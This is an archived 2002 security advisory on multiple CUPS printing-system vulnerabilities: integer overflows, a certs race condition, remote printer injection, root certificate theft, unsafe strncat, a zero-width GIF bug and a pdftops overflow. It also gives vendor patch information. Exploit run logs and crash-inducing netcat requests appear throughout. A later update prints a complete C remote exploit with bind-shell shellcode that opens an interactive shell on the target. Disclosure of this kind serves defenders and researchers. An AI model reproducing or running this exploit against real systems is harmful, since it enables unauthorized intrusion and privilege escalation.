TUCoPS :: Unix :: General
:: unix5893.htm
Multiple Security Vulnerabilities in Common Unix Printing System (CUPS)
20th Dec 2002 [SBWID-5893]
COMMAND
Multiple Security Vulnerabilities in Common Unix Printing System (CUPS)
SYSTEMS AFFECTED
Tested : CUPS-1.1.14-5 - 1.1.17
The following major vendors are known to distribute CUPS by default; in
some cases, it is the default printing implementation used as well:
Apple Computer Inc.
Debian Project
FreeBSD Project
MandrakeSoft Inc.
NetBSD Foundation
Red Hat Inc.
Slackware Linux Inc.
SuSE Inc.
The SCO Group
Turbolinux Inc.
Also, CUPS with Xpdf (Xpdf 2.01) and all prior versions.
Verified on Red Hat Linux 7.0 running CUPS-1.1.14-5 (RPM)
PROBLEM
zen-parse [zen-parse@gmx.net] discovered the following issues,
published in iDEFENSE Security Advisory [12.19.02] :
http://www.idefense.com/advisory/12.19.02.txt
**** ISSUE 1 - Multiple Integer Overflows ****
An integer overflow exists in the CUPSd http interface. Exploitation
allows an attacker to gain the permissions of the 'lp' user id and the
'sys' group id. The offending lines of code can be found in
cgi-bin/var.c:
var = form_vars + form_count;
var->name = strdup(name);
var->nvalues = element + 1;
var->avalues = element + 1;
var->values = calloc(element + 1, sizeof(char *));
var->values[element] = strdup(value);
Since an attacker has control over both element and value, he or she
can overwrite the address of a soon-to-be called function with the
address of arbitrary code. The following is a successful run of the
vanilla-coke exploit ran against test platform [1] built against
glibc-2.2.4-18.7.0.8:
$ ./vanilla-coke
$ ls -l /tmp/suid
- - - - -rwsrwsr-x 1 lp sys 14093 Dec 4 07:50 /tmp/suid
$ /tmp/suid
sh-2.04$ id
uid=4(lp) gid=3(sys) groups=500(farmer)
The exploit created a set user id 'lp' shell. While the current exploit
works only against systems utilizing glibc-2.2.4-18.7.0.8, it is
possible to make modifications that will make it effective against
earlier glibc versions. The vulnerable code also exists in the latest
version of CUPS (test platform [3]) and appears to be exploitable with
slight modifications.
Multiple integer overflows also exist in the image handling code of the
filters in CUPS. The following is a successful run of the mksun exploit
tested against platform [1]:
$ ls -al /tmp/resulted
/bin/ls: /tmp/resulted: No such file or directory
$ ./mksun | lp
request id is lp-100 (1 file(s))
$ cat /tmp/resulted
Ok.
uid=4(lp) gid=3(sys)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),40(dip)
This vulnerability still exists in the latest version of CUPS (test
platform [3]) slight modification of the exploit code is required.
**** ISSUE 2 - /etc/cups/certs/ Race Condition ****
A race condition exists in the creation of /etc/cups/certs/<pid>.
This allows a local attacker to create or overwrite any file as root. A
prerequisite to launching this attack is 'lp' user privileges, which
can be gained through successful exploitation of ISSUE 1 (see above).
The following is a successful run of the ice-cream exploit tested
against platforms [1], [2], and [3]:
sh-2.04$ /tmp/ice-cream
Waiting for creation event.
Trying 127.0.0.1...
Connected to redhat7.0 (127.0.0.1).
Escape character is '^]'.
HTTP/1.1 200 OK
Date: 2002年12月04日 12:37:21 GMT
Server: CUPS/1.1
...
...
Connection closed by foreign host. Hit it. exec some suid with the lib
preloading and then remove /etc/ld.so.preload-type-file to put things
roughly the way they were.
sh-2.04$ ls -l /etc/ld.so.preload-type-file
- - - - -rw-rw-rw- 1 lp sys 20 Dec 4 07:37 /etc/ld.so.preload-type-file
The sample exploit created /etc/ld.so.preload-type-file. An easy
modification can generate /etc/ld.so.preload, which can then be used to
gain root privileges by redefining functions such as getuid() as a
simple "return 0".
**** ISSUE 3 - Adding Printers with UDP Packets/ Root Certificate Design
Flaw ****
Printers can remotely be added to CUPS by sending a specially crafted
UDP packet. The ability to remotely add printers is used in ISSUE 3 as
well as in the exploitation of other subsequent vulnerabilities within
this advisory (see below). The added printer can contain a tainted name
that when clicked on or referenced through other means (image request,
etc.) can exploit ISSUE 1. The exploit does not have to be locally
launched being the shellcode can be modified to connect back to a
system controlled by the attacker.
The following is a successful run of the new-coke exploit tested
against platforms [1] and [2]:
$ ./new-coke 127.0.0.1
Argv[1]=127.0.0.1
punt!
Checking the web interface to CUPS after running this exploit shows the
added printer. The only way to edit or remove this printer through the
web interface is to click on it, which will in turn exploit the
vulnerability.
A consequence of exploiting this vulnerability is that a local attacker
can exploit a design flaw to gain root privileges. A printer is first
added and configured to run on a high numbered port. It is then told to
return a "need authorization" page. The http backend will then
authorize with the current local root certificate, as this is the same
certificate that is needed to access the administrative section of the
web server. Once the certificate has been obtained, it is possible to
add a printer that will execute commands with root privileges.
The following is a successful run of the pardonme exploit script tested
against platform [1]:
$ ./pardonme.sh
Proof of concept - stealing certificate 0 from CUPS
=================================================== Allows access to
/admin/ area which we use to execute code as root.
- - - - - creating tmp printer to steal key from
- - - - - telling it we want the key.
- - - - - listening for key.
- - - - - attempting to create rootshell printer
- - - - - calling /tmp/doitnow
request id is givemeroot-4 (1 file(s))
- - - - - removing tmp printer "hackyou"
- - - - - removing root shell printer "givemeroot" - check /tmp/resulted
- - - - - done
=== contents of file ===
uid=0(root) gid=0(root)
Thu Dec 5 02:19:13 GMT 2002
=== contents of file ===
**** ISSUE 4 - Negative Length Memcpy() Calls ****
Negative length memcpy() calls can lead to a denial of service (DoS)
and, on some platforms, remote root compromise. The following examples
demonstrate these vulnerabilities:
$ nc -v localhost 631
localhost [127.0.0.1] 631 (?) open
POST /printers HTTP/1.1
Host: localhost
Authorization: Basic AAA
Content-Length: -1
$ nc -v localhost 631
localhost [127.0.0.1] 631 (?) open
POST /printers HTTP/1.1
Host: localhost
Authorization: Basic AAA
Transfer-Encoding: chunked
- - - - -FFFFFFFE
Both requests will crash the CUPS daemon. This issue is similar to the
Apache HTTP Server chunking bug that is exploitable on OpenBSD,
FreeBSD, and NetBSD due to their implementations of memcpy(). Platforms
[1], [2] and [3] are all susceptible to this vulnerability.
**** ISSUE 5 - Unsafe Strncat Function Call in jobs.c ****
jobs.c insecurely uses the strncat function call in the setup of the
'options' string. As such, it is possible to exploit this in
conjunction with the vulnerability described in ISSUE 3 to obtain local
root privileges. To exploit the vulnerability, a printer is created. A
job is then sent to the printer with attributes set in such a fashion
as to overflow the options buffer and overwrite the return address of
the frame. Shellcode is then executed. It calls an external program,
/tmp/doitnow, which will be executed with root privileges. In the
process, two files are created that, unless removed, should prevent
CUPS from starting:
/var/spool/cups/d00*-0*
/var/spool/cups/c00*
The following is a succesful run of the tosend script that utilizes the
lift exploit. It has been tested against platform [1]:
$ ./tosend.sh
* local root
* cupsd incorrect usage of strncat in jobs.c
* ========================================== * proof of concept. appends
output from "id" and "date" to
to /tmp/resulted
[+] checking stuff
* Checking for cupsd file
* Checking cupsd is running
* checking for /sbin/pidof
+ ok!
* finding pid of process
13427
+ ok!
* Checking for make
/usr/bin/make
* Checking for nc
/usr/bin/nc
[+] Building stuff
* Making lift
make: `lift' is up to date.
* firing message (needs netcat (nc) to be in your path)
punt!
[+] About to check /tmp/resulted
- - - - - time is now Wed Dec 4 14:27:16 EST 2002
- - - - - current uid == 500
- - - - - current gid == 500
The /tmp/doitnow script, in this case, simply contains the command "id
> /tmp/didit.txt". The tosend script has successfully used the lift
exploit, and the didit.txt file has been created, which, as can be seen
from the contents, was executed with root privileges:
# cat /tmp/didit.txt
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
The exploit is not effective against later versions of CUPS since the
strncat() calls have been replaced with calls to strlcat().
**** ISSUE 6 - Zero Width Images in filters/image-gif.c ****
CUPS improperly check for zero width images in filters/image-gif.c as
can be seen from the following offending code:
...
bpp = ImageGetDepth(img);
pixels = calloc(bpp, img->xsize);
...
xpos ++;
temp += bpp;
if (xpos == img->xsize)
{
ImagePutRow(img, 0, ypos, img->xsize, pixels); ...
The check for reaching the line width is not performed until after the
increment, therefore allowing an attacker to manipulate the chunk
headers and execute arbitrary code.
The following is a successful run of the nogif exploit tested against
platform [1]:
$ ./nogif
zero width gif exploit for cups "imageto*" filters
imagetops filter example.
============================
ppmtogif: computing other colormap...
ppmtogif: 256 colors found
ppmtogif: sorting colormap
Moving img1.gif to /var/tmp
Now make and run ./wrap to emulate printing this job.
$ ./wrap
INFO: lp 7 root img1.gif 1 /var/tmp//////////img1.gif
DEBUG: Page = 612x792; 18,36 to 594,756
DEBUG: ImageOpen("/var/tmp//////////img1.gif", 1, 1, 100, 0, (nil))
Successful exploitation should execute the file /tmp/sh. This
vulnerability still exists in the latest version of CUPS (test platform
[3]). Slight modification of the exploit code is required, however.
**** ISSUE 7 - File Descriptor Resource Leaks ****
Return values of many file and socket operations are not checked,
therefore leading to file descriptor leaks. Attackers can launch a DoS
attack against a system running CUPS. The following is a successful run
of the fanta exploit tested against platform [1]:
$ ./fanta
The error below doesn't appear to show up, and the process hangs at
around 300-400 somewhere sometimes.
Problem in cups is caused by file descriptor leaks, and failing to
check return values for file operations in many areas.
0 sent
100 sent
200 sent
[1] - Red Hat Linux 7.0 running CUPS-1.1.14-5 (RPM)
[2] - Red Hat Linux 7.3 running CUPS-1.1.14-15 (RPM)
[3] - Red Hat Linux 7.3 running CUPS-1.1.17 (Source Install)
Update (24 December 2002)
======
iDEFENSE Security adds in advisory [12.23.02]
http://www.idefense.com/advisory/12.23.02.txt
Thanks to zen-parse [zen-parse@gmx.net] work :
--snip--
The pdftops filter in the Xpdf and CUPS packages contains an integer
overflow that can be exploited to gain the privileges of the target
user or in some cases the increased privileges of the 'lp' user if
installed setuid. There are multiple ways of exploiting this
vulnerability. The following is just one example:
A ColorSpace with 1,431,655,768 elements is created, each element
having three components. 1,431,655,768 is too large to store within a
32-bit integer so the high bit is cut off leaving only 8 which is how
much that is actually allocated.
...
/CS
[
/Indexed
/RGB
1431655768
7 0 R
]
...
The '7 0 R' from above refers to a stream that is read into an array
that is allocated as above. The stream is read until it has reached the
highest index number, or the stream ends. If the filter supplies enough
data the application will crash when trying to access bad memory. It is
possible to exploit this condition by supplying the right length of bad
memory, and stop the stream breaking the reading. A function pointer
can then be overwritten to execute arbitrary code. Example:
...
7 0 obj <<
/Length 229
>>
stream
content to write into memory....endstream
endobject
...
The following is a sample run of the cups-pdf exploit running with the
user's privileges:
$ ./cups-pdf | lp
request id is lp-108 (1 file(s))
$ ls -l /tmp/pdfexploit-worked
- - -rw-rw-r-- 1 farmer farmer 0 Dec 4 13:41 /tmp/pdfexploit-worked
ANALYSIS
========
This vulnerability is locally exploitable. In order to perform "remote"
exploitation, an attacker must trick a user into printing a malformed
PDF file from the command line. In the implementation cases where "lp"
user privileges are attainable, more advanced attacks can be performed
to gain local root access (see iDEFENSE Advisory 12.19.02).
--snap--
Update (06 January 2002)
======
/*
* by sigdoom [at] bigbox.mine.nu
*
* CUPS remote exploit. Exploits integer overflow and gives you shell with
* daemons priviledges (usualy lp), after that you can try to use local
* CUPS exploit to get root.
*
* 1.1.17 and earlier versions are affected. Tested on gentoo with
* installed cups-1.1.17_pre20021025:
*
* $ gcc -o sigcups sigcups.c && ./sigcups -t 127.0.0.1
* [*] connecting to 127.0.0.1 port 631
* [*] trying retaddr = 0x2fffbed8; *4 = 0xbffefb60
* [*] connected, sending exploit...
* [*] done... let's see if we have a shell...
* [*] w000t, here's a shell kiddie...
* uid=4(lp) gid=7(lp) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
* Linux fox.chroot.lt 2.4.20 #2 Sun Dec 29 18:30:35 EET 2002 i686 Pentium III (Coppermine) GenuineIntel GNU/Linux
*
*/
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <getopt.h>
#define BUF_SIZE 4096
#define die(a) { perror("[!] "a); exit(-1); }
int verbose = 0;
char *host = "127.0.0.1";
int port = 631;
unsigned long retaddr = 805289688; /* exploit: *($retaddr * 4) = $address_of_shellcode */
char greet[] = "POST /jobs HTTP/1.1\nContent-type: application/x-www-form-urlencoded\nContent-length: %d\n\n";
char evilmsg[] = "-%u=";
/*
* Bind shell hack by s0t4ipv6@shellcode.com.ar
*/
char hellcode[]=
"\x31\xc0\x89\xc3\xb0\x02\xcd\x80\x38\xc3\x74\x05\x8d\x43\x01\xcd\x80"
"\x31\xc0\x89\x45\x10\x40\x89\xc3\x89\x45\x0c\x40\x89\x45\x08\x8d\x4d"
"\x08\xb0\x66\xcd\x80\x89\x45\x08\x43\x66\x89\x5d\x14\x66\xc7\x45\x16"
"\x13\xd2\x31\xd2\x89\x55\x18\x8d\x55\x14\x89\x55\x0c\xc6\x45\x10\x10"
"\xb0\x66\xcd\x80\x40\x89\x45\x0c\x43\x43\xb0\x66\xcd\x80\x43\x89\x45"
"\x0c\x89\x45\x10\xb0\x66\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41"
"\x80\xf9\x03\x75\xf6\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
"\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
void usage(char *p) {
printf(
"Remote CUPS exploit for 1.1.17 and earlier versions\n"
"by sigdoom [at] bigbox.mine.nu\n"
"Usage: %s [-t <target>, -p <port>, -o <offset>, -r <retaddr>]\n"
"\t-t <target> - IP of target\n"
"\t-p <port> - port where cupsd runs\n"
"\t-o <offset> - offset for retaddr ($retaddr + $offset)\n"
"\t-r <retaddr> - give exact retaddr\n", p);
exit(0);
}
int main(int argc, char *argv[]) {
struct sockaddr_in dest;
int i, off, sock;
fd_set rset;
char buf[BUF_SIZE], buf2[BUF_SIZE];
char c;
while ((c = getopt(argc, argv, "ho:p:r:t:v"))> 0 ){
switch (c) {
case 't':
host = (char *)optarg;
break;
case 'o':
retaddr += atol(optarg);
break;
case 'r':
retaddr = atol(optarg);
break;
case 'p':
port = atoi(optarg);
break;
case 'v':
verbose++;
break;
case 'h':
usage(argv[0]);
case '?':
case ':':
exit(-1);
}
}
printf("[*] connecting to %s port %d\n", host, port);
printf("[*] trying retaddr = 0x%x; *4 = 0x%x\n", retaddr, retaddr*4);
if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
die("socket()");
dest.sin_family = AF_INET;
dest.sin_port = htons(port);
dest.sin_addr.s_addr = inet_addr(host);
bzero(&(dest.sin_zero), 8);
if (connect(sock, (struct sockaddr*)&dest, sizeof(struct sockaddr)) < 0)
die("connect()");
printf("[*] connected, sending exploit...\n");
off = sprintf(buf, evilmsg, retaddr);
for (i = 0; i < sizeof(hellcode)-1; i++)
sprintf(buf+off+i*3, "%%%02X", (unsigned char)hellcode[i]);
sprintf(buf2, greet, strlen(buf));
if (verbose) {
printf("%s", buf2);
printf("%s\n", buf);
}
write(sock, buf2, strlen(buf2));
write(sock, buf, strlen(buf));
printf("[*] done... let's see if we have a shell...\n");
close(sock);
if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
die("socket()");
dest.sin_family = AF_INET;
dest.sin_port = htons(5074);
dest.sin_addr.s_addr = inet_addr(host);
bzero(&(dest.sin_zero), 8);
system("sleep 2");
if (connect(sock, (struct sockaddr*)&dest, sizeof(struct sockaddr)) < 0) {
printf("[-] better luck next time! try different offsets maybe.\n");
die("connect()");
}
printf("[*] w000t, here's a shell kiddie...\n");
write(sock, "id;uname -a\n", 12);
while (1) {
FD_ZERO(&rset);
FD_SET(sock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(sock + 1, &rset, NULL, NULL, NULL);
if (FD_ISSET(sock, &rset)) {
i = read(sock, buf, BUF_SIZE - 1);
if (i <= 0) {
printf("[!] Connection closed.\n");
close(sock);
exit(0);
}
buf[i] = 0;
printf("%s", buf);
}
if (FD_ISSET(STDIN_FILENO, &rset)) {
i = read(STDIN_FILENO, buf, BUF_SIZE - 1);
if (i> 0) {
buf[i]=0;
write(sock, buf, i);
}
}
}
return 0;
}
SOLUTION
Michael Sweet [mike@easysw.com] of Easy Software Products said CUPS
1.1.18 will be released December 19, 2002 which addresses all of these
issues
http://www.cups.org
Mark J Cox (mjc@redhat.com) of Red Hat said the following:
"Red Hat Linux 7.3 and 8.0 ship with CUPS, however it is not enabled by
default. We are currently working on producing erratum packages. When
complete, these will be available along with our advisory. At the same
time, users of the Red Hat Network will be able to update their systems
using the 'up2date' tool."
Richard Blanchard (rblanchard@apple.com) of Apple said the following:
"Affected Systems:
Mac OS X 10.2 - Mac OS X 10.2.2
Mac OS X Server 10.2 - Mac OS X Server 10.2.2
Mitigating Factors: The described vulnerability can be remotely
exploited only when Printer Sharing is enabled. Printer Sharing is not
enabled by default on Mac OS X or Mac OS X Server.
Fixed in: Mac OS X 10.2.3 and Mac OS X Server 10.2.3"
Update (24 December 2002)
======
A patch supplied by the author of Xpdf is available from
ftp://ftp.foolabs.com/pub/xpdf/xpdf-2.01-patch1
which fixes this issue in pdftops when applied to the latest source
code version, 2.01. Additionally, the latest version of CUPS, 1.1.18,
should also fix this issue within the included pdftops utility. It is
available from
http://www.cups.org